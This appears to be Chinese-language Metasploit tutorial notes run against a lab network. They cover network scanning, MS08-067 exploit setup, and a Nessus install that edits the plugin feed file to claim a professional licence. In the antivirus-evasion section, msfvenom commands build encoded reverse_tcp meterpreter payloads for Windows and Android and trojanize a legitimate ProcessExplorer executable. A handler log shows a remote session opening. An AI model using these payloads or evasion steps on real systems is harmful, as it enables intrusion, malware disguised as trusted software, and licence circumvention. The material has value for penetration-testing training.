利用辅助模块
辅助模块
查看目录
# cd /usr/share/metasploit-framework/modules/auxiliary # ll 总用量 108 drwxr-xr-x 47 root root 4096 6月 24 17:25 admin drwxr-xr-x 2 root root 4096 6月 24 20:36 analyze drwxr-xr-x 2 root root 4096 6月 24 20:36 bnat drwxr-xr-x 8 root root 4096 6月 24 17:25 client drwxr-xr-x 4 root root 4096 6月 24 17:25 cloud drwxr-xr-x 2 root root 4096 6月 24 20:36 crawler drwxr-xr-x 2 root root 4096 6月 24 20:36 docx drwxr-xr-x 27 root root 4096 6月 24 17:25 dos -rwxr-xr-x 1 root root 1473 6月 16 23:59 example.py -rw-r--r-- 1 root root 1708 6月 16 23:59 example.rb drwxr-xr-x 2 root root 4096 6月 24 20:36 fileformat drwxr-xr-x 10 root root 4096 6月 24 17:25 fuzzers drwxr-xr-x 2 root root 24576 6月 24 20:36 gather drwxr-xr-x 2 root root 4096 6月 24 20:36 parser drwxr-xr-x 3 root root 4096 6月 24 17:25 pdf drwxr-xr-x 87 root root 4096 6月 24 17:25 scanner drwxr-xr-x 4 root root 4096 6月 24 20:36 server drwxr-xr-x 2 root root 4096 6月 24 20:36 sniffer drwxr-xr-x 9 root root 4096 6月 24 17:25 spoof drwxr-xr-x 5 root root 4096 6月 24 17:25 sqli drwxr-xr-x 2 root root 4096 6月 24 20:36 voip drwxr-xr-x 5 root root 4096 6月 24 17:25 vsploit
查看模块
msf6 > show auxiliary Auxiliary ========= # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/2wire/xslt_password_reset 2007-08-15 normal No 2Wire Cross-Site Request Forgery Password Reset Vulnerability 1 auxiliary/admin/android/google_play_store_uxss_xframe_rce normal No Android Browser RCE Through Google Play Store XFO 2 auxiliary/admin/appletv/appletv_display_image normal No Apple TV Image Remote Control 3 auxiliary/admin/appletv/appletv_display_video normal No Apple TV Video Remote Control 4 auxiliary/admin/atg/atg_client normal No Veeder-Root Automatic Tank Gauge (ATG) Administrative Client 5 auxiliary/admin/aws/aws_launch_instances normal No Launches Hosts in AWS 6 auxiliary/admin/backupexec/dump normal No Veritas Backup Exec Windows Remote File Access 7 auxiliary/admin/backupexec/registry normal No Veritas Backup Exec Server Registry Access 8 auxiliary/admin/chromecast/chromecast_reset normal No Chromecast Factory Reset DoS 9 auxiliary/admin/chromecast/chromecast_youtube normal No Chromecast YouTube Remote Control 10 auxiliary/admin/db2/db2rcmd 2004-03-04 normal No IBM DB2 db2rcmd.exe Command Execution Vulnerability 11 auxiliary/admin/dcerpc/cve_2020_1472_zerologon normal Yes Netlogon Weak Cryptographic Authentication …
使用辅助模块
msf6> use scanner/http/webdav_scanner
案例:搜索不当的SQL Server
msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/mssql/mssql_ping msf6 auxiliary(scanner/mssql/mssql_ping) > options Module options (auxiliary/scanner/mssql/mssql_ping): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD noThe password for the specified username RHOSTS yes The target host(s), see https://github.com/ rapid7/metasploit-framework/wiki/Using-Meta sploit TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption" THREADS 1yes The number of concurrent threads (max one p er host) USERNAMEsanoThe username to authenticate as USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMA IN option set) msf6 auxiliary(scanner/mssql/mssql_ping) > set rhost 192.168.0.106 rhost => 192.168.0.106 msf6 auxiliary(scanner/mssql/mssql_ping) > set THREADS 100 THREADS => 100 msf6 auxiliary(scanner/mssql/mssql_ping) > run [*] 192.168.0.106: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
协议扫描
SSH扫描
msf6 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ssh/ssh_version msf6 auxiliary(scanner/ssh/ssh_version) > set rhost 192.168.0.1/24 rhost => 192.168.0.1/24 msf6 auxiliary(scanner/ssh/ssh_version) > set threads 50 threads => 50 msf6 auxiliary(scanner/ssh/ssh_version) > run [*] 192.168.0.1/24:22 - Scanned 41 of 256 hosts (16% complete) [*] 192.168.0.1/24:22 - Scanned 53 of 256 hosts (20% complete) [*] 192.168.0.1/24:22 - Scanned 82 of 256 hosts (32% complete) [+] 192.168.0.150:22 - SSH server version: SSH-2.0-OpenSSH_9.0p1 Debian-1 ( service.version=9.0p1 openssh.comment=Debian-1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:9.0p1 os.vendor=Debian os.family=Linux os.product=Linux os.cpe23=cpe:/o:debian:debian_linux:- service.protocol=ssh fingerprint_db=ssh.banner ) [*] 192.168.0.1/24:22 - Scanned 103 of 256 hosts (40% complete) [*] 192.168.0.1/24:22 - Scanned 149 of 256 hosts (58% complete) [*] 192.168.0.1/24:22 - Scanned 196 of 256 hosts (76% complete) [*] 192.168.0.1/24:22 - Scanned 197 of 256 hosts (76% complete) [*] 192.168.0.1/24:22 - Scanned 245 of 256 hosts (95% complete) [*] 192.168.0.1/24:22 - Scanned 247 of 256 hosts (96% complete) [*] 192.168.0.1/24:22 - Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed
FTP扫描
msf6 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ftp/ftp_version msf6 auxiliary(scanner/ftp/ftp_version) > set threads 50 threads => 50 msf6 auxiliary(scanner/ftp/ftp_version) > set rhost 192.168.0.1/24 rhost => 192.168.0.1/24 msf6 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ftp/ftp_version msf6 auxiliary(scanner/ftp/ftp_version) > set threads 50 threads => 50 msf6 auxiliary(scanner/ftp/ftp_version) > set rhost 192.168.0.1/24 rhost => 192.168.0.1/24 msf6 auxiliary(scanner/ftp/ftp_version) > run [*] 192.168.0.1/24:21 - Scanned 45 of 256 hosts (17% complete) [*] 192.168.0.1/24:21 - Scanned 55 of 256 hosts (21% complete) [*] 192.168.0.1/24:21 - Scanned 99 of 256 hosts (38% complete) [+] 192.168.0.106:21 - FTP Banner: '220-FileZilla Server version 0.9.41 beta\x0d\x0a220-written by Tim Kosse (Tim.Kosse@gmx.de)\x0d\x0a220 Please visit http://sourceforge.net/projects/filezilla/\x0d\x0a' [+] 192.168.0.150:21 - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a' [*] 192.168.0.1/24:21 - Scanned 104 of 256 hosts (40% complete) [+] 192.168.0.161:21 - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a' [*] 192.168.0.1/24:21 - Scanned 144 of 256 hosts (56% complete) [*] 192.168.0.1/24:21 - Scanned 154 of 256 hosts (60% complete) [*] 192.168.0.1/24:21 - Scanned 203 of 256 hosts (79% complete) [*] 192.168.0.1/24:21 - Scanned 205 of 256 hosts (80% complete) [*] 192.168.0.1/24:21 - Scanned 253 of 256 hosts (98% complete) [*] 192.168.0.1/24:21 - Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous msf6 auxiliary(scanner/ftp/anonymous) > set rhost 192.168.0.161 rhost => 192.168.0.150 msf6 auxiliary(scanner/ftp/anonymous) > run [+] 192.168.0.161:21 - 192.168.0.161:21 - Anonymous READ (220 (vsFTPd 2.3.4)) [*] 192.168.0.161:21 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed 结论:192.168.0.161的FTP允许匿名登录
SNMP扫描
msf6 auxiliary(scanner/ftp/anonymous) > use auxiliary/scanner/snmp/snmp_login msf6 auxiliary(scanner/snmp/snmp_login) > set rhost 192.168.0.1/24 rhost => 192.168.0.1/24 msf6 auxiliary(scanner/snmp/snmp_login) > set threads 50 threads => 50 msf6 auxiliary(scanner/snmp/snmp_login) > run [*] Scanned 50 of 256 hosts (19% complete) [*] Scanned 54 of 256 hosts (21% complete) [*] Scanned 100 of 256 hosts (39% complete) [*] Scanned 104 of 256 hosts (40% complete) [*] Scanned 134 of 256 hosts (52% complete) [*] Scanned 157 of 256 hosts (61% complete) [*] Scanned 181 of 256 hosts (70% complete) [*] Scanned 208 of 256 hosts (81% complete) [*] Scanned 231 of 256 hosts (90% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed
ARP 扫描
msf6 auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/discovery/arp_sweep msf6 auxiliary(scanner/discovery/arp_sweep) > options Module options (auxiliary/scanner/discovery/arp_sweep): Name Current Setting Required Description ---- --------------- -------- ----------- INTERFACE no The name of the interface RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit SHOST no Source IP Address SMAC no Source MAC Address THREADS 1 yes The number of concurrent threads (max one per host) TIMEOUT 5 yes The number of seconds to wait for new data msf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.0.1/24 RHOSTS => 192.168.0.1/24 msf6 auxiliary(scanner/discovery/arp_sweep) > set THREADS 100 THREADS => 100 msf6 auxiliary(scanner/discovery/arp_sweep) > run [+] 192.168.0.1 appears to be up (UNKNOWN). [+] 192.168.0.106 appears to be up (UNKNOWN). [+] 192.168.0.150 appears to be up (VMware, Inc.). [+] 192.168.0.151 appears to be up (UNKNOWN). [+] 192.168.0.152 appears to be up (UNKNOWN). [+] 192.168.0.158 appears to be up (UNKNOWN). [+] 192.168.0.159 appears to be up (UNKNOWN). [+] 192.168.0.161 appears to be up (VMware, Inc.). [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed
HTTP服务扫描
msf6 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/http/http_version msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.0.1/24 RHOSTS => 192.168.0.1/24 msf6 auxiliary(scanner/http/http_version) > set THREADS 100 THREADS => 100 msf6 auxiliary(scanner/http/http_version) > run [+] 192.168.0.1:80 [*] Scanned 44 of 256 hosts (17% complete) [*] Scanned 55 of 256 hosts (21% complete) [*] Scanned 78 of 256 hosts (30% complete) [+] 192.168.0.106:80 Microsoft-HTTPAPI/2.0 [*] Scanned 104 of 256 hosts (40% complete) [+] 192.168.0.161:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 ) [*] Scanned 136 of 256 hosts (53% complete) [*] Scanned 175 of 256 hosts (68% complete) [*] Scanned 187 of 256 hosts (73% complete) [*] Scanned 209 of 256 hosts (81% complete) [*] Scanned 235 of 256 hosts (91% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed
SMB扫描
SMB:SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。
SMB使用了NetBIOS的应用程序接口 (Application Program Interface,简称API)。另外,它是一个开放性的协议,允许了协议扩展——使得它变得更大而且复杂;大约有65个最上层的作业,而每个作业都超过120个函数,甚至Windows NT也没有全部支持到,最近微软又把 SMB 改名为 CIFS(Common Internet File System),并且加入了许多新的特色。
SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统
msf6 auxiliary(scanner/http/http_version) > use auxiliary/scanner/smb/smb_version msf6 auxiliary(scanner/smb/smb_version) > set THREADS 100 THREADS => 100 msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.0.1/24 RHOSTS => 192.168.0.1/24 msf6 auxiliary(scanner/smb/smb_version) > run [*] 192.168.0.1/24: - Scanned 39 of 256 hosts (15% complete) [*] 192.168.0.1/24: - Scanned 60 of 256 hosts (23% complete) [*] 192.168.0.151:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{d6d3c52d-ff47-48d3-aa4f-7ac8c44d7d96}) (authentication domain:LAPTOP-PH3NSDV2) [*] 192.168.0.106:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{c4aea85c-fbd7-47a2-b5b5-f6ad41c48b6e}) (authentication domain:DESKTOP-9A8VFKB) [*] 192.168.0.1/24: - Scanned 104 of 256 hosts (40% complete) [*] 192.168.0.158:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:4d 1h 5m 2s) (guid:{10a33533-6e55-452c-9c62-13561aafa6e1}) (authentication domain:WIN-2VEIIKHJ7M8) [+] 192.168.0.158:445 - Host is running Windows 7 Home Basic SP1 (build:7601) (name:WIN-2VEIIKHJ7M8) (workgroup:WORKGROUP) [*] 192.168.0.161:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional) [*] 192.168.0.161:445 - Host could not be identified: Unix (Samba 3.0.20-Debian) [*] 192.168.0.1/24: - Scanned 107 of 256 hosts (41% complete) [*] 192.168.0.1/24: - Scanned 159 of 256 hosts (62% complete) [*] 192.168.0.1/24: - Scanned 161 of 256 hosts (62% complete) [*] 192.168.0.1/24: - Scanned 203 of 256 hosts (79% complete) [*] 192.168.0.1/24: - Scanned 206 of 256 hosts (80% complete) [*] 192.168.0.1/24: - Scanned 254 of 256 hosts (99% complete) [*] 192.168.0.1/24: - Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed
漏洞扫描
Nexpose
# wget http://download2.rapid7.com/download/NeXpose-v4/NeXposeSetup-Linux64.bin #chmod a+x NeXposeSetup-Linux64.bin #./NeXposeSetup-Linux64.bin #cd /opt/rapid7/nexpose/nsc #./nsc
https://127.0.0.1:3780/ 登录页面出来后就ok了。
Nessus
https://blog.csdn.net/qq_51577576/article/details/123211031
1)https://www.tenable.com/downloads/nessus
2)dpkg -i Nessus-10.2.0-debian9_amd64.deb
3)/bin/systemctl start nessusd.service
或
systemctl start nessusd.service
5)关闭服务:systemctl stop nessusd.service
6)#gedit /opt/nessus/var/nessus/plugin_feed_info.inc 7)添加内容 PLUGIN_SET = "202201250216"; PLUGIN_FEED = "ProfessionalFeed (Direct)"; PLUGIN_FEED_TRANSPORT = "Tenable Network Security Lightning"; 8) # cd /opt/nessus/var/nessus/# mkdir plugins#cp /opt/nessus/var/nessus/plugin_feed_info.inc /opt/nessus/var/nessus/plugins/ 9)更新 https://pan.baidu.com/s/11sV9Kk0mbzQkLcXqUKxO_g?pwd=462u #/opt/nessus/sbin/nessuscli update all-2.0-20220209.tar.gz msf6 > db_connect postgres:123456@127.0.0.1/msf [*] Connected to Postgres data service: 127.0.0.1/msf msf6 >db_status [*] Connected to msf. Connection type: postgresql. Connection name: local_db_service. msf6 > db_import /home/jerry/jerry_01sqgv.nessus [*] Importing 'Nessus XML (v2)' data [*] Importing host 192.168.0.158 [*] Importing host 192.168.0.157 [*] Importing host 192.168.0.151 [*] Importing host 192.168.0.150 [*] Importing host 192.168.0.106 [*] Importing host 192.168.0.1 [*] Successfully imported /home/jerry/jerry_01sqgv.nessus msf6 > hosts -c address,svcs,vulns Hosts ===== addresssvcs vulns ----------- ----- 192.168.0.12 14 192.168.0.106 2376 192.168.0.150 6 46 192.168.0.151 4 28 192.168.0.155 3 2 192.168.0.157 4 29 192.168.0.158 1037
address:IP地址
svcs:探测到的服务数量
vulns:Nessus发现到的漏洞个数
展示所有漏洞
msf6 > vulns
专门漏洞扫描
验证SMB登录
msf6 > use auxiliary/scanner/smb/smb_login msf6 auxiliary(scanner/smb/smb_login) > show options msf6 auxiliary(scanner/smb/smb_login) > set rhost 192.168.0.106-200 rhost => 192.168.0.106-200 msf6 auxiliary(scanner/smb/smb_login) > set smbuser root smbuser => root msf6 auxiliary(scanner/smb/smb_login) > set smbupass 123456 smbupass => 123456 msf6 auxiliary(scanner/smb/smb_login) > ser verbose false [-] Unknown command: ser msf6 auxiliary(scanner/smb/smb_login) > run
扫描开放的VNC空口令
VNC (Virtual Network Console)是虚拟网络控制台的缩写。它是一款优秀的远程控制工具软件,由著名的 AT&T 的欧洲研究实验室开发的。VNC 是在基于 UNIX 和 Linux 操作系统的免费的开源软件,远程控制能力强大,高效实用,其性能可以和 Windows 和 MAC 中的任何远程控制软件媲美。在 Linux 中,VNC 包括以下四个命令:vncserver,vncviewer,vncpasswd,和 vncconnect。大多数情况下用户只需要其中的两个命令:vncserver 和 vncviewer。
msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/vnc/vnc_none_auth msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhost 192.168.0.106-200 msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100 threads => 100 msf6 auxiliary(scanner/vnc/vnc_none_auth) > run
扫描开放的X11服务器
X11也叫做X Window系统,X Window系统 (X11或X)是一种位图显示的视窗系统。它是在 Unix 和类Unix 操作系统,以及 OpenVMS 上建立图形用户界面的标准工具包和协议,并可用于几乎所有已有的现代操作系统。
msf6 auxiliary(scanner/vnc/vnc_none_auth) > use auxiliary/scanner/x11/open_x11 msf6 auxiliary(scanner/x11/open_x11) > set rhost 192.168.0.106/24 rhost => 192.168.0.106/24 msf6 auxiliary(scanner/x11/open_x11) > set threads 100 threads => 100 msf6 auxiliary(scanner/x11/open_x11) > run [*] 192.168.0.106/24:6000 - Scanned 31 of 256 hosts (12% complete) [*] 192.168.0.106/24:6000 - Scanned 53 of 256 hosts (20% complete) [*] 192.168.0.106/24:6000 - Scanned 102 of 256 hosts (39% complete) [-] 192.168.0.157:6000- 192.168.0.157 Access Denied [*] 192.168.0.106/24:6000 - Scanned 105 of 256 hosts (41% complete) [*] 192.168.0.106/24:6000 - Scanned 200 of 256 hosts (78% complete) [*] 192.168.0.106/24:6000 - Scanned 204 of 256 hosts (79% complete) [*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete) [*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete) [*] 192.168.0.106/24:6000 - Scanned 254 of 256 hosts (99% complete) [*] 192.168.0.106/24:6000 - Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed
开启渗透之旅
msf6常用命令
msf6 >show exploits 显示所有的攻击模块
msf6 > show exploits Exploits ======== # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/aix/local/ibstat_path 2013-09-24 excellent Yesibstat $PATH Privilege Escalation 1 exploit/aix/local/xorg_x11_server 2018-10-25 great YesXorg X11 Server Local Privilege Escalation 2 exploit/aix/rpc_cmsd_opcode21 2009-10-07 great No AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow 3 exploit/aix/rpc_ttdbserverd_realpath 2009-06-17 great No ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) 4 exploit/android/adb/adb_server_exec 2016-01-01 excellent YesAndroid ADB Debug Server Remote Payload Execution 5 exploit/android/browser/samsung_knox_smdm_url 2014-11-12 excellent No Samsung Galaxy KNOX Android Browser RCE 6 exploit/android/browser/stagefright_mp4_tx3g_64bit 2015-08-13 normal No Android Stagefright MP4 tx3g Integer Overflow …
msf6 > show auxiliary Auxiliary ========= # Name Disclosure Date RankCheck Description - ---- --------------- --------- ----------- 0 auxiliary/admin/2wire/xslt_password_reset 2007-08-15normal No 2Wire Cross-Site Request Forgery Password Reset Vulnerability 1 auxiliary/admin/android/google_play_store_uxss_xframe_rce normal No Android Browser RCE Through Google Play Store XFO 2 auxiliary/admin/appletv/appletv_display_image normal No Apple TV Image Remote Control 3 auxiliary/admin/appletv/appletv_display_video normal No Apple TV Video Remote Control 4 auxiliary/admin/atg/atg_clientnormal No Veeder-Root Automatic Tank Gauge (ATG) Administrative Client …
msf6 > show options msf6 > use auxiliary/scanner/x11/open_x11 msf6 auxiliary(scanner/x11/open_x11) > back msf6 >search mysql
msf6 > search ms08_067 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great YesMS08-067 Microsoft Server Service Relative Path Stack Corruption Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi msf6 exploit(windows/smb/ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTSyes The target host(s), see https://github.com/rapid7/metas ploit-framework/wiki/Using-Metasploit RPORT445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, no ne) LHOST 192.168.0.150yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targeting msf>show payloads
显示某个模块下的payload
msf6 > use exploit/windows/smb/ms08_067_netapi [*] Using configured payload windows/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms08_067_netapi) > show payloads
使用某个payload
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp msf>show targets msf6 exploit(windows/smb/ms08_067_netapi) > show targets Exploit targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows 2003 SP0 Universal 4 Windows XP SP2 English (AlwaysOn NX) 5 Windows XP SP2 English (NX) … 79 Windows 2003 SP2 Russian (NX) 80 Windows 2003 SP2 Swedish (NX) 81 Windows 2003 SP2 Turkish (NX)
显示更详细的show targets内容
msf6 exploit(windows/smb/ms08_067_netapi) > info Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption Module: exploit/windows/smb/ms08_067_netapi Platform: Windows Arch: Privileged: Yes License: Metasploit Framework License (BSD) Rank: Great Disclosed: 2008-10-28 Provided by: hdm Brett Moore brett.moore@insomniasec.com frank2 jduck Available targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows 2003 SP0 Universal 4 Windows XP SP2 English (AlwaysOn NX) 5 Windows XP SP2 English (NX) … 79 Windows 2003 SP2 Russian (NX) 80 Windows 2003 SP2 Swedish (NX) 81 Windows 2003 SP2 Turkish (NX) Check supported: Yes Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTSyes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload information: Space: 408 Avoid: 8 characters Description: This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development. References: https://nvd.nist.gov/vuln/detail/CVE-2008-4250 OSVDB (49243) https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067 http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.105 lhost => 192.168.0.105 msf6 exploit(windows/smb/ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTSyes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.0.105yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targeting msf6 exploit(windows/smb/ms08_067_netapi) > unset lhost Unsetting lhost... msf6 exploit(windows/smb/ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTSyes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targeting
设置所有模块的lhost
msf6 exploit(windows/smb/ms08_067_netapi) > setg lhost 102.168.0.150 lhost => 102.168.0.150 msf6 exploit(windows/smb/ms08_067_netapi) > unsetg lhost
免杀技术
msfvenom
Options:
-l, --list |
<type> |
列出[类型]的所有模块。类型包括:有效载荷、编码器、NOP、平台、ARCH、加密、格式等 |
-p, --payload |
<payload> |
要使用的有效负载(-list payloads to list,-list options for arguments)。为自定义指定“-”或STDIN |
--list-options |
列表——有效载荷的标准、高级和规避选项 |
|
-f, --format |
<format> |
输出格式(使用--列出要列出的格式) |
-e, --encoder |
<encoder> |
要使用的编码器(使用-列出要列出的编码器) |
--service-name |
<value> |
生成服务二进制文件时要使用的服务名称 |
--sec-name |
<value> |
生成大型Windows二进制文件时要使用的新节名称。默认值:随机4字符alpha字符串 |
--smallest |
使用所有可用编码器生成尽可能最小的有效载荷 |
|
--encrypt |
<value> |
应用于外壳代码的加密或编码类型(使用--list encrypt to list) |
--encrypt-key |
<value> |
用于加密的密钥 |
--encrypt-iv |
<value> |
加密的初始化向量 |
-a, --arch |
<arch> |
用于--有效负载和--编码器的架构(使用--列出要列出的ARCH) |
--platform |
<platform> |
有效负载的平台(使用列出要列出的平台) |
-o, --out |
<path> |
将有效负载保存到文件中 |
-b, --bad-chars |
<list> |
要避免的字符示例: '\x00\xff' |
-n, --nopsled |
<length> |
在有效负载上预先添加一个[length]大小的nopled |
--pad-nops |
使用-n<length>指定的nopled size作为总有效负载大小,自动预加数量的nopled(nops减去有效负载长度) |
|
-s, --space |
<length> |
产生的有效载荷的最大大小 |
--encoder-space |
<length> |
编码有效负载的最大大小(默认为-s值) |
-i, --iterations |
<count> |
对有效负载进行编码的次数 |
-c, --add-code |
<path> |
指定要包括的其他win32外壳代码文件 |
-x, --template |
<path> |
指定要用作模板的自定义可执行文件 |
-k, --keep |
保留--模板行为,并将负载作为新线程注入 |
|
-v, --var-name |
<value> |
指定用于某些输出格式的自定义变量名 |
-t, --timeout |
<second> |
从STDIN读取有效负载时等待的秒数(默认为30,0表示禁用) |
-h, --help |
显示此消息 |
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=9999 R > test.apk
躲避杀毒软件的监测
使用MSF编码器
# msfvenom -l encoders Framework Encoders [--encoder] ====================================== x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder x86/single_static_bit manual Single Static Bit x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder x86/xor_dynamic normal Dynamic key XOR Encodermsfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
自定义可自行文件模板
wget http://download.sysinternals.com/files/ProcessExplorer.zip(也可以从国内网站上取)
msfvenom -a x86 --platform Windows -x ProcessExplorer/procexp.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload1.exe Found 1 compatible encoders Attempting to encode payload with 10 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 381 (iteration=0) x86/shikata_ga_nai succeeded with size 408 (iteration=1) x86/shikata_ga_nai succeeded with size 435 (iteration=2) x86/shikata_ga_nai succeeded with size 462 (iteration=3) x86/shikata_ga_nai succeeded with size 489 (iteration=4) x86/shikata_ga_nai succeeded with size 516 (iteration=5) x86/shikata_ga_nai succeeded with size 543 (iteration=6) x86/shikata_ga_nai succeeded with size 570 (iteration=7) x86/shikata_ga_nai succeeded with size 597 (iteration=8) x86/shikata_ga_nai succeeded with size 624 (iteration=9) x86/shikata_ga_nai chosen with final size 624 Payload size: 624 bytes Final size of exe file: 2661376 bytes Saved as: payload1.exe
将payload1.exe上传到windows下
# msfconsole msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set lhost 192.168.0.150 lhost => 192.168.0.150 msf6 exploit(multi/handler) > set lport 4444 lport => 4444 msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.0.150:4444 [*] Sending stage (175686 bytes) to 192.168.0.106 [*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:30805) at 2022-06-28 17:03:05 +0800 meterpreter > pwd C:\Users\xiang\Desktop
隐秘地启动一个攻击负载
